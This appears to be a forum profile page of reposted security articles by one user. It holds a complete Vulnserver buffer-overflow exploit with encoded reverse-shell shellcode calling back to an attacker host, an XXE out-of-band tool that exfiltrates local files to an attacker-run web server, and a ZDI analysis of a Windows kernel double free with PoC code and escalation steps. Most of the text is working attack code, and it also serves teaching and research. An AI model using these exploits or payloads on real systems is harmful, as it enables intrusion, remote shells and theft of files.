Everything posted by Nytro

  1. Yes, the focus has shifted from Windows to Mac. There are already plenty of fuzzers for IE; I knew Chrome was among the top targets, but I haven't seen much fuss about it...
  2. I've seen it; infosecinstitute has gone badly downhill.
  3. Huh? What exactly should we "do"? PS: Are you over 18, or still in high school trying to decide which path to take?
  4. Why do you want to know?
  5. @CarlCasper - Anything to say in your defense?
  6. Well, show us the evidence, then.
  7. Exploiting Buffer Overflows

     Posted by cyberkryption on February 14, 2015

     Recently, at the Digital Jersey Open Source event, I gave a talk on exploiting a buffer overflow. I used Windows 7 as the host for the vulnerable Vulnserver application, which you can get from the Grey Corner blog. The presentation is available; some of the videos are missing, as they were only a backup in case the live demo ran into issues. The final exploit code is shown below, with the steps to achieve it shown afterwards.

     Final Exploit Code

     #!/usr/bin/python
     import socket

     server = '192.168.43.12'
     port = 9999

     prefix = 'A' * 2006
     eip = '\xAF\x11\x50\x62'    # address of a JMP ESP instruction (0x625011AF), little-endian
     nopsled = '\x90' * 16

     # msfpayload windows/shell_reverse_tcp LHOST=192.168.43.213 LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai
     exploit = (
         "\xbb\x7d\x25\x14\xae\xda\xc0\xd9\x74\x24\xf4\x5e\x33\xc9" +
         "\xb1\x52\x31\x5e\x12\x03\x5e\x12\x83\x93\xd9\xf6\x5b\x97" +
         "\xca\x75\xa3\x67\x0b\x1a\x2d\x82\x3a\x1a\x49\xc7\x6d\xaa" +
         "\x19\x85\x81\x41\x4f\x3d\x11\x27\x58\x32\x92\x82\xbe\x7d" +
         "\x23\xbe\x83\x1c\xa7\xbd\xd7\xfe\x96\x0d\x2a\xff\xdf\x70" +
         "\xc7\xad\x88\xff\x7a\x41\xbc\x4a\x47\xea\x8e\x5b\xcf\x0f" +
         "\x46\x5d\xfe\x9e\xdc\x04\x20\x21\x30\x3d\x69\x39\x55\x78" +
         "\x23\xb2\xad\xf6\xb2\x12\xfc\xf7\x19\x5b\x30\x0a\x63\x9c" +
         "\xf7\xf5\x16\xd4\x0b\x8b\x20\x23\x71\x57\xa4\xb7\xd1\x1c" +
         "\x1e\x13\xe3\xf1\xf9\xd0\xef\xbe\x8e\xbe\xf3\x41\x42\xb5" +
         "\x08\xc9\x65\x19\x99\x89\x41\xbd\xc1\x4a\xeb\xe4\xaf\x3d" +
         "\x14\xf6\x0f\xe1\xb0\x7d\xbd\xf6\xc8\xdc\xaa\x3b\xe1\xde" +
         "\x2a\x54\x72\xad\x18\xfb\x28\x39\x11\x74\xf7\xbe\x56\xaf" +
         "\x4f\x50\xa9\x50\xb0\x79\x6e\x04\xe0\x11\x47\x25\x6b\xe1" +
         "\x68\xf0\x3c\xb1\xc6\xab\xfc\x61\xa7\x1b\x95\x6b\x28\x43" +
         "\x85\x94\xe2\xec\x2c\x6f\x65\xd3\x19\x44\xa0\xbb\x5b\x9a" +
         "\x4b\x87\xd5\x7c\x21\xe7\xb3\xd7\xde\x9e\x99\xa3\x7f\x5e" +
         "\x34\xce\x40\xd4\xbb\x2f\x0e\x1d\xb1\x23\xe7\xed\x8c\x19" +
         "\xae\xf2\x3a\x35\x2c\x60\xa1\xc5\x3b\x99\x7e\x92\x6c\x6f" +
         "\x77\x76\x81\xd6\x21\x64\x58\x8e\x0a\x2c\x87\x73\x94\xad" +
         "\x4a\xcf\xb2\xbd\x92\xd0\xfe\xe9\x4a\x87\xa8\x47\x2d\x71" +
         "\x1b\x31\xe7\x2e\xf5\xd5\x7e\x1d\xc6\xa3\x7e\x48\xb0\x4b" +
         "\xce\x25\x85\x74\xff\xa1\x01\x0d\x1d\x52\xed\xc4\xa5\x72" +
         "\x0c\xcc\xd3\x1a\x89\x85\x59\x47\x2a\x70\x9d\x7e\xa9\x70" +
         "\x5e\x85\xb1\xf1\x5b\xc1\x75\xea\x11\x5a\x10\x0c\x85\x5b" +
         "\x31"
     )

     brk = '\xcc'
     padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
     attack = prefix + eip + nopsled + exploit + brk + padding

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     connect = s.connect((server, port))
     print s.recv(1024)
     print "Sending Evil Buffer to TRUN "
     s.send(('TRUN .' + attack + '\r\n'))
     print s.recv(1024)
     s.send('EXIT\r\n')
     print s.recv(1024)
     s.close()

     The stages of code used to achieve remote code execution are shown below.

     Code 1 – Initial Crash

     #!/usr/bin/python
     import socket

     server = '192.168.43.12'
     port = 9999

     length = int(raw_input('Length of attack: '))

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     connect = s.connect((server, port))
     print s.recv(1024)
     print "Sending attack length ", length, ' to TRUN .'
     attack = 'A' * length
     s.send(('TRUN .' + attack + '\r\n'))
     print s.recv(1024)
     s.send('EXIT\r\n')
     print s.recv(1024)
     s.close()

     Code 2 – Cyclic Pattern to locate EIP

     #!/usr/bin/python
     import socket

     server = '192.168.43.12'
     port = 9999

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     connect = s.connect((server, port))
     print s.recv(1024)
     print "Sending Evil Buffer to TRUN ."
     # 3000-byte cyclic pattern (output of Metasploit's pattern_create.rb 3000)
     attack = (
         "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
         "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
         "Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
         "Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
         "Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
         "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
         "Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9"
         "Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9"
         "Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9"
         "As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
         "Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9"
         "Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"
         "Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
         "Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9"
         "Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9"
         "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9"
         "Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9"
         "Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9"
         "Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9"
         "Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9"
         "Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9"
         "Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9"
         "Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9"
         "Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9"
         "Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"
         "By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
         "Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9"
         "Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9"
         "Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9"
         "Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
         "Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9"
         "Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9"
         "Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9"
         "Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9"
         "Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
         "Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9"
         "Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9"
         "Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9"
         "Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9"
         "Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9"
         "Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9"
         "De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9"
         "Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9"
         "Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9"
         "Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
         "Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9"
         "Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9"
         "Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9"
         "Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9"
         "Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
     )
     s.send(('TRUN .' + attack + '\r\n'))
     print s.recv(1024)
     s.send('EXIT\r\n')
     print s.recv(1024)
     s.close()

     Code 3 – Convert.sh used to convert Hex to ASCII

     TESTDATA=$(echo '0x38.0x43.0x6F.0x39' | tr '.' ' ')
     for c in $TESTDATA; do
         echo $c | xxd -r
     done
     echo ""

     Code 4 – Confirm EIP location in Buffer

     #!/usr/bin/python
     import socket

     server = '192.168.43.12'
     sport = 9999

     prefix = 'A' * 2006
     eip = 'BBBB'
     padding = 'F' * (3000 - 2006 - 4)
     attack = prefix + eip + padding

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     connect = s.connect((server, sport))
     print s.recv(1024)
     print "Sending Buffer to TRUN "
     s.send(('TRUN .' + attack + '\r\n'))
     print s.recv(1024)
     s.send('EXIT\r\n')
     print s.recv(1024)
     s.close()

     Code 5 – Confirming JMP ESP

     #!/usr/bin/python
     import socket

     server = '192.168.43.12'
     port = 9999

     prefix = 'A' * 2006
     eip = '\xAF\x11\x50\x62'
     nopsled = '\x90' * 16
     brk = '\xcc'
     padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
     attack = prefix + eip + nopsled + brk + padding

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     connect = s.connect((server, port))
     print s.recv(1024)
     print "Sending Evil Buffer to TRUN "
     s.send(('TRUN .' + attack + '\r\n'))
     print s.recv(1024)
     s.send('EXIT\r\n')
     print s.recv(1024)
     s.close()

     Code 6 – Bad Characters

     #!/usr/bin/python
     import socket

     server = '192.168.43.12'
     port = 9999

     prefix = 'A' * 2006
     eip = '\x42\x42\x42\x42'
     nopsled = '\x90' * 16
     badchars = (
         "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
         "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
         "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
         "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
         "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
         "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
         "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
         "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
     )
     brk = '\xcc'
     padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
     attack = prefix + eip + nopsled + badchars + brk + padding

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     connect = s.connect((server, port))
     print s.recv(1024)
     print "Sending Evil Buffer to TRUN "
     s.send(('TRUN .' + attack + '\r\n'))
     print s.recv(1024)
     s.send('EXIT\r\n')
     print s.recv(1024)
     s.close()

     That's All Folks....!
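As a side note, the 2006-byte `prefix` used above can be recovered from the Code 2 cyclic pattern without Metasploit's pattern_offset.rb. A minimal sketch (Python 3 here for clarity; the EIP value 0x396F4338 corresponds to the bytes 0x38.0x43.0x6F.0x39 fed to Convert.sh in the article):

```python
import string

def cyclic_pattern(length):
    # Same "Aa0Aa1...Dv9" sequence that Metasploit's pattern_create.rb emits.
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return ''.join(chunks)[:length]
    return ''.join(chunks)[:length]

def pattern_offset(pattern, eip_value):
    # EIP holds a little-endian dword, so reverse the bytes to get the
    # substring as it appeared in the buffer.
    raw = bytes.fromhex(eip_value.replace('0x', '')).decode('ascii')
    return pattern.find(raw[::-1])

pattern = cyclic_pattern(3000)
print(pattern_offset(pattern, '0x396F4338'))  # -> 2006, hence prefix = 'A' * 2006
```

The reversed bytes spell "8Co9", which occurs exactly once in the 3000-byte pattern, at offset 2006.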
Source: https://cyberkryption.wordpress.com/2015/02/14/exploiting-buffer-overflows/
  8. Exploiting XXE With Out-of-Band Channels

     Hey, this post is about a cool technique that was presented at Black Hat EU 2013 by Alexey Osipov and Timur Yunusov. The idea is to use recursive external entity injection to make the vulnerable application send an HTTP request to an attacker's web server containing the contents of a file of the attacker's choice. This works by reading the file and appending it as a payload to the end of a URL, which we then try to load as an external entity; if we look in the web server's log files, we can see the file's contents, as long as they can be rendered as plain text or XML. In the video they talk about a Metasploit module that can be used to exploit this. We needed it to exploit SOAPSonar, but I didn't have any luck finding it, so Rob and I decided to build our own. OK, so the code isn't very good - I'm not a programmer by any stretch of the imagination - but it does work. Here is a video of us using it to exploit a real application:

     #[Authors]: Ben 'highjack' Sheppard (@highjack_) & Rob Daniel (@_drxp)
     #[Title]: XXE OOB file retriever
     #[Usage]: sudo python xxeoob.py localfile
     #[Special Thanks]: Alexey Osipov (@GiftsUngiven), Timur Yunusov (@a66at) thanks for the awesome OOB techniques and Dade Murphy

     import BaseHTTPServer, argparse, socket, sys, urllib, os, ntpath

     localPort = 0
     localIP = ""
     localFile = ""

     def status(message):
         print "\033[0;31;1m[\033[0;34;1m+\033[0;31;1m] \033[0;32;1m" + message + "\033[0m"

     def end():
         status("Completed - Press any key to close")
         raw_input()
         quit()

     class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
         # Note: the banner and argument parsing below run once, when the
         # class body is executed at import time.
         print """\033[0;31;1m
               _ ._  _ , _ ._
             (_ ' ( `  )_  .__)
           ( (  (    )    `)  ) _)
          (__ (_   (_ . _) _) ,__)
               `~~`\ ' . /`~~`
               ,::: ;   ; :::,
              ':::::::::::::::'
           __________/_ __ \____________
         \033[0;31;1m[\033[0;34;1m  Title\033[0;31;1m] XXE OOB file retriever
         \033[0;31;1m[\033[0;34;1mAuthors\033[0;31;1m] Ben Sheppard & Rob Daniel\033[0m
         """
         global localIP
         localIP = socket.gethostbyname(socket.gethostname())
         parser = argparse.ArgumentParser()
         parser.add_argument("file", help="set local file to extract data from", action="store")
         parser.add_argument("--port", help="port number for web server to listen on", action="store", default=80)
         parser.add_argument("--iface", help="specify the interface to listen on", action="store", default="eth0")
         parser.add_argument("--mode", help="print) outputs stage 1\nurl) crafts stage 1 url", action="store", default="url")
         args = parser.parse_args()

         if localIP.startswith("127."):
             ipCommand = "ifconfig " + args.iface + " | grep -Eo 'inet addr:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -f 2 -d :"
             ipOutput = os.popen(ipCommand)
             localIP = ipOutput.readline().replace("\n", "")

         global localFile
         localFile = args.file
         global localPort
         localPort = int(args.port)
         global stage1content
         stage1content = "<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://" + localIP + ":" + str(localPort) + "/stage2.xml\">%remote;%int;%trick;]>"

         if args.mode == "print":
             status("Printing xml so it can be pasted into vulnerable app:")
             print stage1content
         else:
             status("Malicious xml file is located at http://" + localIP + ":" + str(localPort) + "/stage1.xml")

         def log_request(self, *args, **kwargs):
             pass

         def do_GET(s):
             pageContent = ""
             if "/stage1.xml" in s.path:
                 status("Receiving stage1 request")
                 pageContent = stage1content
             elif "/stage2.xml" in s.path:
                 status("Receiving stage2 request")
                 global localFile
                 pageContent = "<!ENTITY % payl SYSTEM \"" + localFile + "\"> <!ENTITY % int \"<!ENTITY % trick SYSTEM 'http://" + localIP + ":" + str(localPort) + "?%payl;'>\">"
             else:
                 status("Saving contents of " + localFile + " to " + os.path.dirname(os.path.abspath(__file__)))
                 pageContent = ""
                 localFile = ntpath.basename(localFile)
                 fo = open(localFile, "wb")
                 try:
                     fo.write(urllib.unquote(s.path).decode('utf8'))
                 except Exception, e:
                     print str(e)
                 fo.close()
                 status("Completed - Press any key to close")
                 raw_input()
                 try:
                     httpd.server_close()
                 except:
                     pass
             s.send_response(200)
             s.send_header("Content-type", "text/html")
             s.end_headers()
             s.wfile.write(pageContent)

     if __name__ == '__main__':
         server_class = BaseHTTPServer.HTTPServer
         httpd = server_class(('', localPort), MyHandler)
         try:
             httpd.serve_forever()
         except:
             pass
         httpd.server_close()

     Posted by highjack

     Source: exploiting xxe with out of band channels - highjack
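For reference, the two DTD stages this tool serves can be reproduced without the web-server plumbing. The sketch below (Python 3; the attacker address 192.0.2.10, port 80, and the target file path are placeholder assumptions, not values from the tool) builds essentially the same strings the script assigns to stage1content and its stage2 response:

```python
# Hypothetical attacker endpoint and target file, for illustration only.
ATTACKER = "192.0.2.10"            # placeholder (TEST-NET) address
PORT = 80
TARGET_FILE = "file:///etc/hostname"  # placeholder target

# Stage 1: delivered to the vulnerable parser; pulls stage 2 over HTTP.
stage1 = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE root [<!ENTITY % remote SYSTEM '
    '"http://{0}:{1}/stage2.xml">%remote;%int;%trick;]>'.format(ATTACKER, PORT)
)

# Stage 2: parameter entities that read the file and append it to a URL,
# so its contents land in the attacker's access log.
stage2 = (
    '<!ENTITY % payl SYSTEM "{0}"> '
    '<!ENTITY % int "<!ENTITY % trick SYSTEM '
    "'http://{1}:{2}?%payl;'\">".format(TARGET_FILE, ATTACKER, PORT)
)

print(stage1)
print(stage2)
```

The nesting is the whole trick: %payl reads the file, %int defines %trick with the file contents embedded in the URL, and dereferencing %trick performs the out-of-band request.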
  9. Just another day at the office: A ZDI analyst's perspective on ZDI-15-030

     Matt Molinyawe | February 19, 2015
     Security Researcher, HP Security Research – Zero Day Initiative

     Many of us here at the ZDI are blessed to look at the world's best vulnerability research coming from researchers around the world. For those of us who work at the ZDI, it's literally nothing but zero-day, every day. And we're not just saying that: it's documented by the record number of published vulnerabilities attained last year, the most for a single year in the history of the Zero Day Initiative program. An interesting case came in through the program in late October from a researcher named n3phos. The report contained vulnerability information affecting the win32k.sys kernel component on Windows 8.1 x64, and the examples included in the case were very well documented and well written. We recently released an advisory for the case, ZDI-15-030 in our system. This is also known as CVE-2015-0058 to MITRE, and it was addressed as part of MS15-010 by Microsoft. Here is a write-up from the submission which we felt was exceptional and wanted to share with the research community. Let's start things off with a demo of the Windows kernel privilege escalation for Windows 8.1 x64:

     Similar to the old phrase "cleanliness is next to godliness," this privilege escalation cleaned up after itself to prevent crashing the operating system and attained SYSTEM privileges. It came in with source code featuring bypasses for ASLR and SMEP and full continuation of execution. I compiled the source to verify this case. As you can see in the video, this was a pretty straightforward case to look at.
     Vulnerability Analysis

     The report noted that a crash would occur with the following actions taken:

     hCursorA = CreateCursor(NULL, 1, 1, 4, 4, AndMask, XORMask);
     hCursorB = CreateCursor(NULL, 1, 1, 4, 4, AndMask, XORMask);

     linked = CallService(__NR_NtUserLinkDpiCursor,
                          SYSCALL_ARG(hCursorA),
                          SYSCALL_ARG(hCursorB),
                          SYSCALL_ARG(0x30));

     CallService(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorB), SYSCALL_ARG(0x0));
     CallService(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(0x0));

     I compiled an executable from this code and ran it in release mode, and a screen appeared called the "Sad Face of Sorrow" (formerly colloquially known as the "Blue Screen of Death").

     Figure 1: Sad Face of Sorrow

     The following crash stack signature appeared in the kernel debugger:

     Figure 2: The crash stack signature

     Looking at the access violation, it appeared that the memory was freed and accessed again by the call to DestroyCursor.

     Figure 3: The access violation

     The debug session of the crash verified the researcher's findings in the report, in which n3phos had noted: there was an attempt to free a memory location which had already been freed before (a double free). This happens during the second call to NtUserDestroyCursor, where CursorA gets destroyed, and is caused by the reuse of a dangling pointer to the already freed CursorB. By linking CursorA and CursorB together with a call to NtUserLinkDpiCursor, all we have to do in order to hit the double free is to destroy CursorB before CursorA. And since we have control between the two calls, we can easily replace the freed CursorB.

     How the cursors are linked

     The report noted the following about cursors inside of NtUserLinkDpiCursor:

     Figure 4: A closer look at NtUserLinkDpiCursor

     LinkDpiCursor takes three arguments: two valid cursor handles and one dword as a new dpi value.
     It first checks whether the dpi is a multiple of 0x10 and in the range 0x10 – 0x40. Then GetCursorForDim checks whether CursorA's current dpi is equal to the newly provided dpi; if it is, the function fails. The default dpi value for a cursor created with CreateCursor is 0x20. By supplying 0x30 as the argument, we can pass GetCursorForDim and reach the linking code, which, when simplified, looks like this:

     CursorB->prevPointer = CursorA
     CursorB->nextPointer = CursorA->nextPointer
     CursorA->nextPointer = CursorB

     Here's more information regarding the cursor object:

     Figure 5: Empty cursor object on the way

     When calling CreateCursor, a new empty cursor object gets allocated through HMAllocObject, which then calls Win32AllocPool. What's important to note here is the allocation size of 0x98 bytes and the POOL_TYPE 0x21 enumerable value, which stands for "PagedPoolSession." This information will be useful later on when utilizing this bug.

     Figure 6: Inside DestroyCursor

     The code checks whether a specific cursor flag is set. If it is not set, the function proceeds to check whether the cursor has its nextPointer initialized and, if so, takes the branch to the recursive DestroyCursor call. However, if the cursor flag is set, the code path on the left is taken and some unlinking is performed. When a cursor is created with CreateCursor, this flag is never set. What happens in the PoC is the following:

     1. CursorA and CursorB get linked together.
     2. CursorB gets normally destroyed and freed; no unlinking is performed.
     3. CursorA gets destroyed, with the branch taken to the recursive DestroyCursor call because its nextPointer points to CursorB.
     4. The previously destroyed CursorB gets destroyed again.

     It is now clear that one can easily take advantage of this bug between steps 2 and 3 by replacing the freed cursor object.

     EXPLOITATION

     n3phos then looked more closely into the DestroyCursor function.
     During this function, there is a call made to CleanupCursorObject:

     Figure 7: Calling CleanupCursorObject

     If an attacker happens to control the values at offset 0x38 and offset 0x40, he can free an arbitrary object of his choice. This requires some kind of memory leak.

     Replacing the cursor with something useful

     As mentioned earlier, the cursor object gets allocated on the PagedPoolSession. This means we have to exclude pretty much all the allocations used in the ntoskrnl module as possible replacements for the cursor, since they get allocated on the NonPagedPoolNx (PoolType 0x200). The small allocation size of 0x98 bytes is also a problem, because most GDI objects are bigger than that. A possible object that would fit would be, for example, a solid brush (0x98 bytes in size), but because it gets allocated with Win32AllocateFromPagedLookasideList, its address will never be the same as that of the freed cursor. One further restriction is the need for a zero reference count. The researcher decided to use a gesture info structure.

     Figure 8: AllocGestureInfo

     Like the cursor, this gesture info structure gets allocated by HMAllocObject. What really matters is that we have enough control of its members to trigger the arbitrary free in CleanupCursorObject: ulArguments is at offset 0x38 in the cursor and needs to be nonzero; arbitraryFree at offset 0x40 is where the leaked object address gets written. The size of this gesture info object is calculated as follows: 0x30 (cbSize) + 0x40 (cbExtraArgs) + 0x30 (internal) = 0xa0 bytes. (The cursor is actually 0xa0 bytes big.)

     Leaking an object

     The object used for the leak was a palette object. It can be created with the CreatePalette GDI function, which takes one logical palette as an argument:

     palNumEntries - The number of entries in the logical palette.
     palPalEntry - An array of PALETTEENTRY structures that define the color and usage of each entry in the logical palette.

     A PALETTEENTRY is basically a DWORD that defines the RGB values the palette uses and is laid out like this: 0x00bbggrr, where the leading zero is a flag. If we look at the palette in memory, it looks something like this:

     Figure 9: The palette object

     When the palette gets allocated, its size is calculated like this: 0x98 (the basic object size) + 4 * numEntries. One can control the size of the palette to an extent, which will be important later on when we leak it. (Besides that, this object has some very interesting members, so if you ever happen to have a bug in GDI you might want to have one of these.) For example, if you overwrite the numEntries member, you can read and write out of bounds (on the PagedPool). By overwriting the palEntries pointer at offset 0x80, we can read and write anywhere. Also, the "this" pointer will be quite useful in the information leak. To read and write, we just call the following from Gdi32 in userland:

     GetPaletteEntries (reading)
     SetPaletteEntries (writing)

     xxxBMPtoDIB

     To understand how the "information leak" works, we first need to know a bit more about DIBs and the clipboard. From the MSDN description:

